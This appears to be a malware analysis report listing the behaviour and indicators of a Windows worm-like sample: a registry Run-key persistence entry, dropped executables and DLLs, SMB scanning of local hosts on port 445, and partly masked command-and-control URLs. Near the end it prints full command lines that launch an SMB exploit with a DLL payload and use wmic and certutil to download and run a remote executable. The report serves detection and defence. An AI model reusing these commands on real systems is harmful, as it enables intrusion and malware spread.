Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Win0Start' = 'C:\Users\All Users\cpt.exe'
- <Drive name for removable media>:\_èçºî½âãüîòµäîä¼þ_.txt
- <Drive name for removable media>:\contractualdeadlines.zip
- <Drive name for removable media>:\calculatorworksheet.zip
- <Drive name for removable media>:\productos.zip
- <Drive name for removable media>:\excel_example.zip
- <SYSTEM32>\rundll32.exe
- C:\users\all users\blue.exe
- C:\_èçºî½âãüîòµäîä¼þ_.txt
- D:\_èçºî½âãüîòµäîä¼þ_.txt
- C:\users\all users\mmkt.exe
- %WINDIR%\temp\ssession
- C:\users\all users\cpt.exe
- C:\users\all users\down64.dll
- C:\users\all users\zlib1.dll
- C:\users\all users\xdvl-0.dll
- C:\users\all users\ucl.dll
- C:\users\all users\tucl-1.dll
- C:\users\all users\trfo-2.dll
- C:\users\all users\trch-1.dll
- C:\users\all users\tibe-2.dll
- C:\users\all users\star.xml
- C:\users\all users\star.fb
- C:\users\all users\star.exe
- C:\users\all users\ssleay32.dll
- C:\users\all users\posh-0.dll
- C:\users\all users\libxml2.dll
- C:\users\all users\libeay32.dll
- C:\users\all users\exma-1.dll
- C:\users\all users\dmgd-4.dll
- C:\users\all users\crli-0.dll
- C:\users\all users\coli-0.dll
- C:\users\all users\cnli-1.dll
- C:\users\all users\blue.xml
- C:\users\all users\blue.fb
- %CommonProgramFiles%\system\scanlog
- C:\users\alluse~1\a
- C:\users\all users\mmkt.exe
- '<LOCALNET>.27.73':445
- '<LOCALNET>.0.72':445
- '<LOCALNET>.27.88':445
- '<LOCALNET>.0.73':445
- '<LOCALNET>.27.89':445
- '<LOCALNET>.0.74':445
- '<LOCALNET>.27.90':445
- '<LOCALNET>.0.75':445
- '<LOCALNET>.27.91':445
- '<LOCALNET>.0.76':445
- '<LOCALNET>.27.92':445
- '<LOCALNET>.0.77':445
- '<LOCALNET>.0.78':445
- '<LOCALNET>.0.84':445
- '<LOCALNET>.27.94':445
- '<LOCALNET>.0.79':445
- '<LOCALNET>.27.95':445
- '<LOCALNET>.0.80':445
- '<LOCALNET>.27.28':80
- '<LOCALNET>.27.96':445
- '<LOCALNET>.0.81':445
- '<LOCALNET>.27.97':445
- '<LOCALNET>.0.82':445
- '<LOCALNET>.0.83':445
- '<LOCALNET>.27.98':445
- '<LOCALNET>.27.87':445
- '<LOCALNET>.27.93':445
- '<LOCALNET>.0.71':445
- '<LOCALNET>.0.64':445
- '<LOCALNET>.0.58':445
- '<LOCALNET>.0.59':445
- '<LOCALNET>.27.74':445
- '<LOCALNET>.0.60':445
- '<LOCALNET>.27.75':445
- '<LOCALNET>.0.61':445
- '<LOCALNET>.27.76':445
- '<LOCALNET>.27.77':445
- '<LOCALNET>.0.62':445
- '<LOCALNET>.27.78':445
- '<LOCALNET>.0.63':445
- '<LOCALNET>.27.79':445
- '<LOCALNET>.0.70':445
- '<LOCALNET>.27.80':445
- '<LOCALNET>.0.65':445
- '<LOCALNET>.27.81':445
- '<LOCALNET>.0.66':445
- '<LOCALNET>.27.82':445
- '<LOCALNET>.0.67':445
- '<LOCALNET>.27.83':445
- '<LOCALNET>.0.68':445
- '<LOCALNET>.27.84':445
- '<LOCALNET>.0.69':445
- '<LOCALNET>.27.85':445
- '<LOCALNET>.27.86':445
- '<LOCALNET>.27.99':445
- http://11#.#0.159.105/get.php?co##########################################################################################
- http://11#.#0.159.105/get.php?ha#######################################################################################################
- 'C:\users\all users\cpt.exe'
- 'C:\users\all users\mmkt.exe'
- 'C:\users\all users\cpt.exe' ' (with hidden window)
- 'C:\users\all users\mmkt.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.0.27.28 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.0....' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c wmic /node:10.0.27.28 process call create "cmd.exe /c certutil.exe -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe&C:\c.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.0.27.28 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.0....
- '%WINDIR%\syswow64\cmd.exe' /c wmic /node:10.0.27.28 process call create "cmd.exe /c certutil.exe -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe&C:\c.exe"
- '%WINDIR%\syswow64\wbem\wmic.exe' /node:10.0.27.28 process call create "cmd.exe /c certutil.exe -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe&C:\c.exe"
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe&C:\c.exe
- '<SYSTEM32>\rundll32.exe'
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://49.###.210.96:8080/car/c.exe C:/c.exe&C:\c.exe